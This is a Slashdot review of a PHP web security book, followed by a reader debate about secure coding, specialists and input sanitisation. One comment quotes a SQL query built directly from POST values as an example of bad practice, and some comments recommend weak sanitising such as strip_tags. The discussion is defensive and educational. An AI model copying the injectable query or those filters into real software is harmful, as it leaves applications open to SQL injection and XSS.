Securing PHP Web Applications

Michael J. Ross writes "The owners and the developers of typical Web sites face a quandary, one often unrecognized and unstated: They generally want their sites' contents and functionality to be accessible to everyone on the Internet, yet the more they open those sites, the more vulnerable they can become to attackers of all sorts. In their latest book, Securing PHP Web Applications, Tricia and William Ballad argue that PHP is an inherently insecure language, and they attempt to arm PHP programmers with the knowledge and techniques for making the sites they develop as secure as possible, short of disconnecting them from the Internet." Keep reading for the rest of Michael's review. Securing PHP Web Applications author Tricia Ballad, William Ballad pages 336 publisher Addison-Wesley Professional rating 7/10 reviewer Michael J. Ross ISBN 978-0321534347 summary A wide-ranging guide to PHP security. The book was published by Addison-Wesley on 26 December 2008, under the ISBN 978-0321534347. The publisher maintains a Web page for the book, where visitors will find a detailed description, the table of contents, and a sample chapter ("Cross-Site Scripting," Chapter 10) only three pages in length — undoubtedly a record. That is essentially all one will find on that Web page. Most technical publishers offer far more information on the Web pages for each one of their books — such as the preface and index online, updates to the book's content (including reported errata, confirmed and otherwise), descriptions of the chapters, information about and pictures of the author(s), feedback from readers and the media, and, perhaps most valuable of all, the sample code used in the given book. (However, that is less of a factor with this particular book, since it does not contain much sample code.) Many such publisher pages even have links to book- or technology-specific forums, where readers can post questions to the authors, and read other people's questions and the replies. Addison-Wesley, like all of the Pearson Education imprints, has through the years proven quite sparing with the supplementary online content, thereby no doubt reducing the number of prospective readers and other traffic to their sites.

Despite its fairly modest length (336 pages) in comparison to the average programming book being published these days, Securing PHP Web Applications tries to cover a sizable number of topics, in five parts, which encompass 17 chapters: general security issues; error handling; system calls; buffer overflows and sanitizing variables; input validation; file access; user authentication; encryption and passwords; sessions and attacks against them; cross-site scripting; securing Apache and MySQL; securing IIS and SQL Server; securing PHP; automated testing; exploit testing; designing a secure application; and hardening an existing application. The book concludes with an epilogue on professional habits to improve the security of one's applications, an appendix describing additional resources, a glossary, and an index. Throughout the book, the authors illustrate key ideas with the use of a sample application — in this case, a Web-based guest book.

The first chapter, which is the only one in the first part of the book, is rather brief, but does prime the reader for all the material that follows, because it explains the inherent security problems of Web applications, and explains the dangers of some of the inadequate measures that naive programmers can take, such as security through obscurity, and the common belief that hackers only go after major Web sites.

Chapter 2 focuses on error handling, but begins with an example of SQL injection, and how effective it can be against the first iteration of the guest book application code. The most potentially confusing part of the discussion is when the authors show an SQL injection attack that perverts an INSERT statement by injecting it with an SQL command to drop a table, and the two commands are separated by a semicolon. But then instead of discussing how multiple SQL statements can be separated by semicolons (well, depending upon one's server settings), they instead discuss separating PHP commands was semicolons, but not SQL commands. Nonetheless, readers will find some good advice on handling unexpected input and using a centralized error-handling mechanism, even if quite simple. Also, the question of whether or not to accept HTML in user input, is briefly addressed. However, the material would be more useful if the authors were to explain specifically when htmlspecialchars() should be used instead of htmlentities(). Also, the option of using standard bulletin board codes (such as [b]bold[/b]) should have been mentioned, if only briefly with references to outside resources. At the bottom of page 22, the bare regex following a !"~" is not valid PHP (or even Perl, which it much more resembles). Lastly, one should not follow the recommendation of providing absolutely no feedback to the user as to what characters were invalid in the text they entered. Hackers gain nothing from being told the obvious, that HTML tags are not allowed; but legitimate users will be incensed when told only that the system didn't understand their input, with no indication as to how to make it acceptable.

In the third chapter, the authors explain the obvious danger of using unsanitized user input within a call to the operating system, such as exec() or system(). The discussion here assumes that you are on a *nux server, not Windows. Two PHP commands are suggested for sanitizing user input, as well as the option and advantages of building a custom API that is limited to only the system calls that should ever be executed within your Web application. On page 33, their test code appears to assume that register_globals has been enabled (so the GET variables in the malicious URL are automatically instantiated and set to the values in the URL), which is disappointing for a book on PHP security, since the dangers inherent in register_globals are so severe that it is now disabled by default, is deprecated in PHP version 5.3.0, and will be completely removed in version 6.

In Chapter 4, readers get an overview of program and data storage on a computer, including buffers, stacks, and heaps, as groundwork for learning what buffer overflows are and how hackers can try to exploit them to execute database and operating system statements, including using your server as a staging point for remote exploits and denial-of-service attacks. The fifth chapter dovetails nicely with the previous one, because it discusses input validation, which is a key component of avoiding boundary condition attacks. The authors explain the importance of validating tainted data, using character length and regular expressions. One simple countermeasure to such attacks that the authors fail to mention, is simply setting a maximum input length ("maxlength") on HTML "input" tag fields. After all, most entry fields on forms are input tags — not textarea tags, for which the maxlength attribute only specifies wrapping. Using maxlength does not prevent manipulation of POST values, but does prevent the less knowledgeable attacker from overflowing input tag fields.

Chapter 6 explains the risks in working with local and remote files, and why it is critical to not allow mischievous users do such tricks as inserting a pathname in a filename, when your code is expecting only a simple filename. Unfortunately, some of the code and claims in this chapter are suspect: On page 70, the value of $path_to_uploaded_files is missing a needed trailing forward slash. The suggested method of processing malicious file paths could be made much more simple and secure with the use of basename(). The file_get_contents() attack shown on page 71 again seems to assume that register_globals is enabled; even if it were enabled, the exploit wouldn't work because $file is always set to a value in the script code. The authors seemingly believe that GET variables can override anything in a script. Nonetheless, their advice about handling user-uploaded files is spot on.

Part 4 of the book focuses on user security. The first of its chapters covers user authentication and authorization — combining the two for their sample application — and starting with usernames and passwords. Access denial due to invalid username or password is supposedly illustrated by Figure 7.2, but all that it illustrates is that a concept that needs no visual depiction is not made more clear by trying to represent it with a confusing image. The authors provide a thorough discussion of authentication purposes and methods, as well as password encryption and strength. Yet they provide no rationale for setting the default values for usernames, passwords, and e-mail addresses to " " simply because the columns are non-nullable. After all, a record would only be added to the table if those values were known. Also, in their validateUsernamePassword() function, they've mistakenly commented out the first "return FALSE;" and they create unused variables $username and $password.

Chapter 8 provides an overview of various types of encryption, particularly for passwords, and some recommendations for PHP-supported algorithms. One blemish in this discussion is the claim that the longer the key for decryption, the longer it will take for your application to load the data (presumably the encrypted text) — which doesn't make sense. Also, their password() and login() functions reference class member names of an object not yet defined or explained. Code out of context like this can be confusing to the reader.

Sessions are a key component of maintaining and securing the identity of an authenticated user as she goes from one page to another in your PHP application. In Chapter 9, the authors describe the three major categories of session attacks: fixation, hijacking, and injection. The next chapter addresses cross-site scripting (XSS), but runs only three pages, and provides no examples of an XSS attack, which would have been helpful for the reader to understand how such an attack could try to compromise his PHP code, and what sort of malicious code to look for in his site. However, references to four open source XSS filtering projects are provided, in case the reader would like to learn more about them.

The fifth part of the book is devoted to securing whichever server environment on which you choose to host your application — Apache and MySQL, or IIS and Microsoft SQL Server, as well as PHP. In the chapter on PHP, the authors present the Zend Core release of PHP, which can save developers time in installing components of the LAMP stack, and also save them from reinventing the wheel, by using the Zend Framework. Other techniques for hardening PHP are discussed. Chapters 14 and 15 explain how to use automated testing and exploit testing, to increase your application's security, using powerful exploit testing tools — free and proprietary.

The sixth and final part of the book contains two chapters, which purportedly discuss the advantages of designing security into a new application right from the start, and how to improve security in an application that has already been built. In the former chapter, the authors stress the importance of balancing no design ("Skip reading Slashdot for one day...") and too much design (i.e., stalling). But the material mostly consists of the basics of designing a Web application, with no new information on security, and concludes with a brief reiteration of security principles detailed in earlier chapters. The latter chapter offers some good advice on having separate development and test environments, in addition to the production environment. The principles expounded in each of the two chapters, do not overlap at all, and yet together they apply equally to new applications under development just as much as they do to finished applications; splitting the principles up does not make sense.

Sadly, the book does not live up to its potential. In general, much of the sample code is sloppy, as exemplified by the instances noted above. The authors and the technical reviewers should have tested the attacks, and thereby found which ones don't work. Even the HTML should not be used by any new Web developer as an example of quality code that adheres to leading standards. In the HTML that they have their sample PHP code generate, the tag attribute values are in single quotes, and not double, which means all of that code would need to be changed to make it compliant with XHTML 1.0. Moreover, by choosing to use single quotes for both the attribute values and the PHP strings, the authors end up having to escape every single attribute value quote mark, which wastes space and looks ridiculous. They repeat this at the end of Chapter 6, but this time with all double quotes. Also, some of the technical decisions are rather odd, such as their setting those default values to spaces in the user table, noted earlier. A few terms are used strangely, as well, such as their statement that IIS's footprint is the number of entry points to it; actually, a Web server software's footprint generally refers to how much memory it consumes. Every chapter ends with a summary, titled "Wrapping It Up," none of which add any value to the book. There are at least three technical errata in the book that should have been caught: spaces in "u + rwx, go + rx" (page 76), and the invalid addresses "www.blog/modsecurity.org" (page 215) and "www.ballad-nonfiction/SecuringPHP/" (page 288; adding ."com" does not fix it).

On the other hand, the book's marketing copy claims that "Tricia and William Ballad demystify PHP security by presenting realistic scenarios and code examples, practical checklists, detailed visuals..." and that is certainly a fair claim. Most of the explanations are straightforward and informative. As a side note, kudos to Addison-Wesley for printing this book on recycled paper; one can only hope that all publishers adopt that policy.

The primary value of Securing PHP Web Applications is that it touches upon security topics that are often glossed over or completely neglected in other PHP security books and articles. This is important, because online miscreants will be searching out every possible chink in your Web site's armor. You should do the same, before they strike — and this book shows how.

Michael J. Ross is a freelance Web developer and writer.

You can purchase Securing PHP Web Applications from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.

Just don't

[Lord+Ender]

If you want to produce secure web apps, you need to hire a security specialist to audit the application, and (ideally) assist with the design phase as well. Application security is an incredibly subtle thing in many ways. A developer who read a book on security will get security wrong. It's a topic that simply requires a specialist.

Re:Just don't

[FredFredrickson]

Things like this always surprise me when I hear them.

Making a secure PHP web app is not that hard.

-Make sure to keep globals off (or initialize all variables before using them.
-Sanitize all inputs before getting to the database.
-Always sanitize user-inputted data before displaying it on screen (strip_tags)
-Check permissions on every page. (Make sure I can't change id=17 to id=18 and see things I shouldn't.)
And so on...

Honestly, it's not some mysterious voodoo, it's very basic procedures (like these) that all programmers should get in the habit of doing, no matter what language you use.

Re:Just don't

A developer who read a book on security will get security wrong.

So I guess we have to tell Bruce Schneier that his "Secure Programming for Linux and Unix HOWTO" book is simply useless.

Re:Just don't

[Joe+U]

Or at least take the time to validate all your input. Geez, if I had $1 for every time someone wrote an app that didn't properly validate.

Re:Just don't

Application security is an incredibly subtle thing in many ways. A developer who read a book on security will get security wrong. It's a topic that simply requires a specialist.

Feeling insecure and trying to build yourself some job security by belittling developers? How cute. Yeah, let's leave developers in the dark so overpaid "specialists" can be required to do twice the work.

Re:Just don't

[Zero__Kelvin]

I know what you mean. It's like heart surgery. All you do is:

1. Cut a guy open
2. Put him on bypass
3. Do a little tweaking
4. Take him off bypass
5. Sew 'em back up

I'm not really sure why people think it is so hard!

The fact that you think it is easy means you are unable to do it properly and don't know that you don't know.

Re:Just don't

[PotatoFarmer]

So I guess we have to tell Bruce Schneier that his "Secure Programming for Linux and Unix HOWTO" book is simply useless.

We? Who is this 'we'? You tell him, I'm not going anywhere near Bruce while you're in the process of making him angry.

Oblig. link to Schneier Facts

Re:Just don't

[Phil+John]

What about protecting against CSRF?

That one's fun because even if you use tokens in forms, if you have even 1 XSS vulnerability any countermeasures are rendered useless.

Re:Just don't

[Zero__Kelvin]

I'd rather have a dollar for everyone who said: " all you have to do is validate your input !" when they had no idea to do so properly themselves. I am quite certain that 90% of the people saying that make an attempt at validating that they think is successful, when in fact the validation logic is thoroughly flawed. You might not be one of them; I'm just making a point.

Re:Just don't

[FredFredrickson]

As a programmer, I probably couldn't do what a heart surgeon would do. But as a programmer, I can do what programmers do. Part of my job is security. Some times its tedious, sometimes I miss things. But it's not magic or voodoo. And I believe the heart surgeon doesn't beleve what he does is voodoo either.

Re:Just don't

[mikael_j]

The fact that you think it is easy means you are unable to do it properly and don't know that you don't know.

Or it's possible that, you know, he's an experienced developer who's got enough experience with PHP that to him it really is easy.

/Mikael

Re:Just don't

[cbiltcliffe]

.....Geez, if I had $1 for every time someone wrote an app that didn't properly validate.

....then you'd be almost as rich as me, if I had $1 for every time someone wrote a web page that didn't properly validate.

And I'd be almost as rich as random_grammar_nazi, if they had $1 for every time someone wrote a sentence that didn't properly validate.

There's a running theme here, in case you hadn't noticed. People, as a general rule, suck at following rules that don't have obvious, immediate consequences for breaking them.

Re:Just don't

[LurkerXXX]

"Sanitize all inputs before getting to the database."

NO! How many times to people have to get hammered because their own or someone else's sanatizer didn't really sanitize (ex: php's mysql_escape_string vs mysql_REAL_escape_string, and other idiotic things)
before folks will listen to DBAs and start using well parametrized stored procedures/prepared statements.

If you use a well parametrized stored procedures/prepared statements you don't have to worry about any idiots trying to do sql injection, nor how you or someone else may have botched your sanitizer.

Re:Just don't

[pjt33]

Sanitize all inputs before getting to the database.

I don't know why language / library designers nowadays don't make it harder to use unsanitised input. Make it easy to use prepared statements and hard (or impossible if you don't care about those who say "But I know what I'm doing and don't want to take a performance hit from using features designed to make things safer") to execute SQL directly. For something like PHP which is primarily going to be used as glue between a database and a web server it might even make sense to automatically compile its SQL execution statement into a prepared statement unless an extra package is installed and configured - a hurdle which the average user wouldn't bother with, but which might placate the soi-disant power user.

Re:Just don't

[steve.howard]

For that matter, learn modern database query techniques. That how-to guide you read over the weekend that shows you how to do

mysql_query("SELECT * FROM USERS WHERE name= {$_POST['username']}' AND PASSWORD= '{$_POST['password']}'")

was a nice teaching tool, but PHP 5 + PDO/mysqli can accomplish this with placeholders. That's not to say you shouldn't validate your data to make sure that it's what it should be, it's just that if you screw that up but use placeholders, your damage is minimal.

Re:Just don't

[kuzb]

I completely agree. In a lot of cases, it's not the language which is the problem. It's the programmer. They run out and learn PHP from some outdated tutorial that had bad practices without understanding their implications. Too many people spend a week with the language and then think they are somehow experts. PHP can be made as secure as any other language out there. The trick is to actually read the manual, and learn the pitfalls.

Re:Just don't

[FredFredrickson]

My list wasn't exhaustive, but you can eliminate XSS by scrubbing all your inputs. If the only thing a user can post is plaintext and some bbcode, that's all they'll post.

Another cool one that I'm surprised Myspace hasn't used:
A great way to kill phishers is using the out-bound warning page. Re-code all outbound hyperlinks to a "Warning, this is no longer myspace" page, then allow them to click the url.

Re:Just don't

[Lord+Ender]

And yet I spend lots of time cleaning up after developers who think they understand security; they even list their security skills on their resumes. They just keep getting it wrong.

Re:Just don't

[kuzb]

NO! How many times to people have to get hammered because their own or someone else's sanatizer didn't really sanitize (ex: php's mysql_escape_string vs mysql_REAL_escape_string, and other idiotic things) before folks will listen to DBAs and start using well parametrized stored procedures/prepared statements.

More important than sanitization is actual validation. Is it supposed to be an integer? Check that first. If the input is no good, reject the whole thing before it gets in to your query in any way, shape or form. http://php.net/filter is a very underrated way to do this.

OTOH, I do agree, much grief could be saved if more people just used PDO.

Re:Just don't

Or at least take the time to validate all your input. Geez, if I had $1 for every time someone wrote an app that didn't properly validate.

Uh oh, I forgot to validate $1 !

Re:Just don't

[FredFredrickson]

No doubt, not everybody lives up to their own hype. Some people aren't nearly as qualified as they think they are. I'm sure neither you nor I are exempt from this. It's easier to find something wrong with somebody's code, than to code it correctly in the first place. It's nice to have a second pair of eyes for that reason.

That being said, it's still not rocket science, or magic. It's just tedious, and requires forethought. Considering all the angles is important. When you get into the habit, it becomes second nature.

Surely this is not a limitation of PHP or the PHP programmer. Just coincidental evidence against particular instances you've encountered make it seem as if it is so. (Anecdotes)

Re:Just don't

So I guess we have to tell Bruce Schneier that his "Secure Programming for Linux and Unix HOWTO" book is simply useless.

I've got the book and I have never got security wrong... maybe because I never actually read it.

Its not useless though.. its propping my server cabinet up.

Re:Just don't

[encoderer]

For CSRF to work the attacker has to be able to inject his own content into your site that a victim can then come by and download.

Quite a few ways to do this, but if you take the precautions mentioned above, you'll be safe.

Tho, I would add one more IMPORTANT bullet point: Install the Suhosin Hardened PHP Patch.

And for fool-proof input sanitization, use filter_input() (and the other Filter functions PHP introduced at 5.something)

Re:Just don't

[aftk2]

Myspace does that.

Re:Just don't

Right, because we all know security specialists are born with such knowledge, there is no way in hell "mere mortals" can obtain such arcane powers!

Re:Just don't

- strip_tags will not protect you against XSS if the value ends up in an attribute.
- you also need to be very careful with character encodings; not all systems will interpret the bytestream the same way as your 'sanitizer' did. Null bytes and overlong UTF-8 sequences are popular examples.
- sanitizing input before it gets to the database will result in users not able to edit their content. You need to use the appropriate escaping when when user-supplied data is used in another context.

For more, see http://acko.net/blog/safe-string-theory-for-the-web

Re:Just don't

And for fool-proof input sanitization, use filter_input() (and the other Filter functions PHP introduced at 5.something)

Far from fool proof, for example the email validation function just uses some copy-pasted PEAR regex, it lacks length checks and fails on valid RFC 822 addresses. The API is awful and the extension has had it's own share of security issues.

• http://www.php-security.org/MOPB/MOPB-18-2007.html
• http://www.php-security.org/MOPB/MOPB-19-2007.html
• http://secunia.com/advisories/24824/

Don't get me started on the API...

// sane code
$valid_int = (int) $_GET['raw_int'];
$valid_int = intval($_GET['raw_int']);

// moronic code
$valid_int = filter_var($_GET['raw_int'], FILTER_VALIDATE_INT);
$valid_int = filter_input(INPUT_GET, 'raw_int', FILTER_VALIDATE_INT);

Re:Just don't

[Ninnle+Labs,+LLC]

If you want to produce secure web apps, you need to hire a security specialist to audit the application, and (ideally) assist with the design phase as well. Application security is an incredibly subtle thing in many ways.

Or you can save yourself money in the long run and just teach your developers how to design and code secure web pages.

A developer who read a book on security will get security wrong. It's a topic that simply requires a specialist.

So how did the specialist learn security? Osmosis?

Re:Just don't

[SgtChaireBourne]

"Sanitize all inputs before getting to the database."

NO! How many times to people have to get hammered because their own or someone else's sanatizer didn't really sanitize (ex: php's mysql_escape_string vs mysql_REAL_escape_string, and other idiotic things)
before folks will listen to DBAs and start using well parametrized stored procedures/prepared statements.

If you use a well parametrized stored procedures/prepared statements you don't have to worry about any idiots trying to do sql injection, nor how you or someone else may have botched your sanitizer.

That is correct, but PHP programming is taught generally as the blind leading the blind. I usually say PHP will be fine for those that are already quite good at C. The sanitizers have often been very disappointing when looking under the hood. Quite often there is no real parsing going on, simply global search and replace which can be gamed.

Use of parametrized stored procedures and prepared statements needs to be part of the introduction to databases with any language. The APIs are there, they're documented. Use them.

Re:Just don't

[ericspinder]

A developer who read a book on security will get security wrong. It's a topic that simply requires a specialist.

And specialists come from where? Are these individuals born with an innate knowledge of PHP security, or are these skills passed from father to son, mentor to apprentice? No, they get their knowledge from books, lectures, and websites; they read and learn (hopefully). I'd say the the best are likely senior developers who've developed a specialty.

Acting like security isn't in the realm of the developer is a particularly dangerous statement, and I really do hope that it's just a joke. As it's one of the basic parts of web application (no matter what the language). Sure one could hire a security specialist to review the process, but you're better off just using an intrusion detecting application (or service), and a proper code review.

Re:Just don't

[dblackshell]

and you could also blame books like the above one... register_globals? for f***s sake we are using php 5 (Some of us at least) which has it turned off and books like this one put us back (at least) 8 years in time...

I think that the ones that wrote the books are security experts and due to the fact that in their last pentest (security audit) didn't find any xss/sql injection/rfi vulnerability they decided to "repair" the problem.

Re:Just don't

[morgan_greywolf]

I always validate against '\$[0-9].*'!

Re:Just don't

mysql_query("SELECT * FROM USERS WHERE name= {$_POST['username']}' AND PASSWORD= '{$_POST['password']}'")

you forgot a single quote before {$_POST['username']}'

Re:Just don't

I googled "Secure Programming for Linux and Unix HOWTO" and it seems to have been authored by David A. Wheeler. Was this just a typo or did I not get the joke?

Thanks

Re:Just don't

[merreborn]

Another cool one that I'm surprised Myspace hasn't used:
A great way to kill phishers is using the out-bound warning page. Re-code all outbound hyperlinks to a "Warning, this is no longer myspace" page, then allow them to click the url.

Yeah, that's a great way to make your users more aware of potential phishing attempts, except for the fact it's fucking terrible from a usability perspective.

Sure, you might help a few mouthbreathers realize they're being phished, but frankly, they aren't going to read your warning page anyway. They're the type that just click "okay" to make dialogs go away, with no thought to the consequences.

And for the rest, you're only going to annoy people who now have to go through *two* clicks and page loads for what would have otherwise been a single click. I clicked the link, I know what I'm doing. Don't make me tell you twice.

Re:Just don't

[merreborn]

A developer who read a book on security will get security wrong. It's a topic that simply requires a specialist.

Any developer who doesn't qualify as a "security specialist" by your definition has no business writing code in the first place.

Write secure code, and draft secure designs from the beginning. If you're a developer, security is your job, not an afterthought for someone else to layer on after the fact.

Re:Just don't

Yes, no company should invest in training their developers on how to securely develop apps. Clearly it is far more in their benefit to keep them in the dark on how to do this and hire expensive "specialists" to do this. This is one of the stupidest fucking posts I've ever seen.

Re:Just don't

[thetoadwarrior]

I take it you're an out of work security specialist looking to promote yourself, correct?

Re:Just don't

Let me just make sure I'm on your same page..

Three bug reports, each about 2 years old, each filed shortly after the filter extension was released, and all fixed in the next release, coupled with a syntax that you dislike, is a reason to avoid the Extension?

And about your syntax beef, as pedantic as it may be.

The example you chose, validating an int, is about the most elegant validation problem out there.

Try sanitizing a more complex data type. Hell, try SANITIZING an int, not just filtering it.

Doing so will be far less elegant than a simple cast.

Re:Just don't

[thetoadwarrior]

A good programmer writes secure code (otherwise what's the point of the code?) so if you need to hire a security specialist then something has gone wrong.

Sure someone should test it once it's complete but that doesn't mean the programmer doesn't know what he's doing in regards to security.

Re:Just don't

[Zero__Kelvin]

If that were true, he would have gone through all of the effort to get to the point where it was easy for him , and would know full well that it wasn't easy to get there at all.

Re:Just don't

[thetoadwarrior]

His idea is sound and in use on numerous sites in different ways. The idea is to warn the user when they're leaving the site. That doesn't necessarily require a extra page but if you do it then you can have it automatically move onto the link after a short period and it's still only make you click once.

Re:Just don't

[Zero__Kelvin]

First, if we accept your standard for good - and I do - then we can conclude that there are not that many good programmers. (It is a documented fact that the majority of programmers don't know how to do secure programming.)

That being said, you are totally missing the boat by mistakenly categorizing the system analysis and design task as programming. I can be a master of secure programming, but if the system design is flawed I will have perfectly implemented a flawed scheme.

Re:Just don't

[thetoadwarrior]

It's always best to write your own sanitizers than to rely on what PHP provides. PHP, in general, is a bit of a shit language in the sense it feels like a hobby project. So, in my opinion, you should always write your own sanitizers.

Re:Just don't

[TheSpoom]

In other words, "Give me money, there's no other way! You people can't learn my craft, it's just too complicated! Only I can secure your applications, stupid developers!"

Re:Just don't

[thetoadwarrior]

That's web development though. In a lo of instances there are programmers that are interested in making something but not making it properly so they haven't learned the finer points of programming because that'll take time and get in the way of making the next great web 2.0 app.

Re:Just don't

[j_sp_r]

Why not use prepared queries? That way, you don't put your data into a string that makes up the query.

Re:Just don't

[Joe+U]

No, they think I'm insane when I design validation systems. I'm also big on using allow/deny all type filters.

Client validation. (Just for kicks, it potentially stops a roundtrip)
App Server validation. (I don't trust my users)
DB validation. (I don't trust my app coders)

Re:Just don't

[Ironica]

Let me guess... Zero_Kelvin makes his living as a software security expert. And, if ordinary programmers were to think that they could (*gasp*) write secure code all by themselves, he'd be out of a job.

Website software security is important, and not blatantly easy... but I don't know that it's soooo specialized that it needs its own entire profession.

Rather than comparing software security experts to heart surgeons, maybe we could compare them to professional babyproofers. They would have you believe that, until they get done, your home is a deathtrap to your munchkin, and there's just no way you could POSSIBLY have accounted for all the hidden dangers. Unless, of course, you spent a little time on the web, finding out about common causes of injury and death in home accidents for children in your offspring's age group, and maybe oh, I dunno, paid attention to your child to see what they are likely to hurt themselves doing.

It's not that they're useless, but they're doing something for you that, with some time and effort, you can do yourself. It just depends on whether you have more money to hire another body, or more resources on staff that can be developed to do things right in the first place.

Re:Just don't

[thetoadwarrior]

I've taken courses run by security firms and take a general interest in security so yes I would feel confident enough to put it on my CV knowing I don't get it wrong.

Re:Just don't

[Goaway]

Always sanitize user-inputted data before displaying it on screen (strip_tags)

Except strip_tags will not save you in all cases. As a matter of fact, it's probably better to never use that function.

This is why PHP is viewed as insecure - it puts in tons of these pitfalls, and makes it LOOK like you're doing the right thing, while you are actually happily shooting yourself in the foot.

Re:Just don't

[Tablizer]

before folks will listen to DBAs and start using well parametrized stored procedures/prepared statements.

That can crank the cost of project up a lot because everytime you need a new column from a table you have to ask the DBA and/or go to the database schema editor. I'm not saying it's not worth it, only that it requires non-trivial money.

Also, things like Query-By-Example are difficult to do with via stored procedures and prepared statements.
       

Re:Just don't

[Knara]

After reading the last 3-4 posts you put up in this thread, the only thing I've come away with is:

Man... it sure must be hard to walk around with that large of a chip on your shoulder.

Re:Just don't

[Anubis350]

If that were true, he would have gone through all of the effort to get to the point where it was easy for him , and would know full well that it wasn't easy to get there at all.

While the OP may have had a couple flaws in the analogy (and hey, no analogy is perfect), it does account for this. I know a *lot* of doctors from most common branches of medicine, and the amount of times you hear the phrase "it was a routine..." when they talk about their day is impressive, just as I would have a routine day in research.

It may not be easy to get to that point, but that doesnt mean every single thing is prefaced with "So, I took 15 years to learn this, but..."

The OP was right, the procedures are good ones that every programmer, regardless of language, should be in the habit of doing. The knowing how to do that in your language of choice is left to you in the post, which doesnt speak to the relative time spent learning it. If you're a good coder, and good in your language of choice, it should be reasonably easy to write decently secure code

Re:Just don't

[Ironica]

I actually specifically said it was NOT easy (well, not "blatantly easy" anyway). But heck, programming (well) is not easy. Almost anyone can write code that does something, but it takes thought, planning, skill, and training to write code that does something efficiently, securely, and with a well-designed interface. Are you also of the opinion that "programmers" should not be entrusted with interface design? A specialist should come in and tell them how the website shall work from the point of view of the user? Because, you know, some of them screw this part up, too.

There's no shortage of bad code on the internet. That doesn't mean that a good programmer cannot possibly handle the task of creating a well-designed site. it just means there's a lot of bad programmers. ;-)

Re:Just don't

[Zero__Kelvin]

Your throwing around statements like the OP was right, and then going on to be explicit about what the OP was right about. There is only one problem. I not only never said it wasn't a good idea to do secure programming, I explicitly stated that it was a good idea. The issue came from the OP saying it is easy to do.

"If you're a good coder, and good in your language of choice, it should be reasonably easy to write decently secure code"

Ding! Ding! Ding! We have another winner! Why don't you actually read the section of dwheelers website related to secure programming and then come back, once you start to realize how little you understand secure programming, and we can then have an intelligent exchange. If anybody is still not getting this: If you think secure programming is easy, don't bother replying. The fact that you think the solution is simple is proof that you have a tenuous grasp of the problem domain at best.

HINT: Even the very best secure programmers say it is very difficult to get right.

Re:Just don't

[Lord+Ender]

No, I have a job. And forensics to clean up after the hack bills at a much higher rate than the preventative measures do, actually.

Re:Just don't

[Zero__Kelvin]

I now see the disconnect in our communication. I absolutely think that a programmer should program and a GUI designer should do GUI designs. A security expert should handle security, and an SCM specialist should hand Source Code Management (or whatever of the various TLA expansions you prefer) However nothing says these cannot all be the same person. That person has to be really smart, and very dedicated. They also have to have real background and experience in those areas.

The problem is that almost 100% of programmers say secure programming "isn't that hard", which - again - is prima facia evidence that most programmers don't even know what secure programming is . I said it elsewhere in this thread, but it is worth repeating with a little extra wording appended: Even the very best secure programmers say it is hard. If it really is easy for you, then you should be the expert to whom everyone looks, since the ones to whom everyone looks now say it is hard.

Obviously most of the posters here on Slashdot are far superior to Bruce Schneier and Mudge. (ROTFLMA) ;-)

Cheers, and sorry for any miscommunication!

Re:Just don't

[Count+Fenring]

I'm mostly with you, except that PHP does have a fantastic amount of brain damage. It is actually a problem that there are multiple escaping and sanitization functions, all of which look like the right thing, but most of which are dangerously flawed.

Sure, it's the security-conscious programmer's job to know the difference; but it's still dumb as hell of the language designers to add an unneeded potential gotcha for no good reason.

Re:Just don't

[billcopc]

Heart surgery, auto repair, cooking... once you learn how it works, it's easy.

What these things are not is OBVIOUS. An untrained goon will have a hard time figuring out heart surgery without some kind of training. That same goon will also not have the slightest clue how to fix an ailing piece of shit car. Why would we somehow magically believe the goon is capable of writing secure PHP code ?

None of these jobs are unnecessarily complicated, once you learn what the hell you're supposed to be doing. The problem is, it's a heck of a lot easier for the goon to pretend he's a PHP coder, because people have this funny habit of posting code snippets online for the cretins to copy and paste verbatim. "Look Ma, I'm a porgamror. What's a float?"

I'm pretty sure if you demonstrate heart surgery on Youtube, some dinkus in the retarded states will try to duplicate the procedure. That's just human stupidity at work.

Re:Just don't

[wrballad]

Works great for the corp that has a DBA on staff. Now what about the mom and pop that wants a shoping cart, or the guy making a single site?

Re:Just don't

[wrballad]

Yes a lot of dopes out there are still running with register_globals on ("its easier to code"). This will get corrected in 6...if you can convince all of hem to upgrade...most are still iffy on moving to 5. There is a large mass of bad PHP coders out there ("its an easy language"). We need to educate that crew.

Re:Just don't

[Otto]

It's a conundrum indeed. Trying to convince web hosts to support PHP 5 has been an uphill battle for years and years, and major software like WordPress won't move past PHP 4 compatibility because some web hosts still don't support it.

We really need to get rid of PHP 4 everywhere. It would help a lot with this sort of thing.

Re:Just don't

[micheas]

Blog posts are one example where a prepared query would fail.

Names are another place that you can quickly run into problems if the name is something like Søren, where the name is not ascii.

Sanitizing data is a task you sometimes have to do.

But, you should always try to use prepared statements or try and find some other way to avoid ever using input as something to test, not execute or pass on.

Re:Just don't

[j_sp_r]

I've set my script up to use UTF all the way and that seems to work.

Re:Just don't

[Zero__Kelvin]

Software Engineering is hard. Heart Surgery is hard. Truly good guitar playing is hard. If I said that because Joe Satriani plays Surfing With The Alien with ease, it is easy to play that would be quite obviously absurd to anyone familiar with the song who has ever picked up a guitar and tried to play one.

So please stop with the ridiculous arguments like it is easy because there are those on this planet that can do it with ease. It is a just plain stupid thing to say, really. We all say stupid things. Not all of us keep saying them after it was pointed out why they are stupid.

Re:Just don't

[Zero__Kelvin]

To the moron who has several shill accounts and is stalking me and modding me down ... go fuck yourself you ignorant coward.

And lest anyone think I'm delusional, I have been posting for more than 10 years here, always with the same basis content, and almost never getting modded down. The same day I get in a disagreement with "Reality Master 101" almost all of my polls start getting modded as trolls. Maybe it isn't RM101. It could be some other idiot who likes RM101. There is definitely someone doing it, and that person is a true coward, and a major waste of carbon.

Re:Just don't

[Lobster+Quadrille]

As somebody who performs security audits on PHP apps for a living, you sir, don't have a clue. There are so many subtle issues with session manipulation, local system configuration, complex program logic, SSL implementation... The list is awfully long, and you couldn't put it all into a shelf of books.

Though to be fair, if everybody did the stuff you mentioned, it would be a much better internet.

Re:Just don't

[sherriw]

Strip tags is not sufficient. You need to do htmlspecialchars().

Re:Just don't

[Lobster+Quadrille]

Small correction:

It's always best to write your own sanitizers than to rely on what PHP provides (If you know what you're doing)

There are a lot of issues that people overlook with character encodings and input mangling. I can't tell you how many PHP apps I've audited that had some guy's custom weak filter functions.

Depending on your needs, there are a handful of really good sanitation libraries out there, but you're correct that they're not provided with PHP.

Re:Just don't

[Lobster+Quadrille]

Any non-trivial project with only one person working on it is going to have security holes. Without another person checking your work, you're bound to make mistakes.

So why not have the guy checking your work be a "specialist" who knows what he's doing?

Re:Just don't

[LurkerXXX]

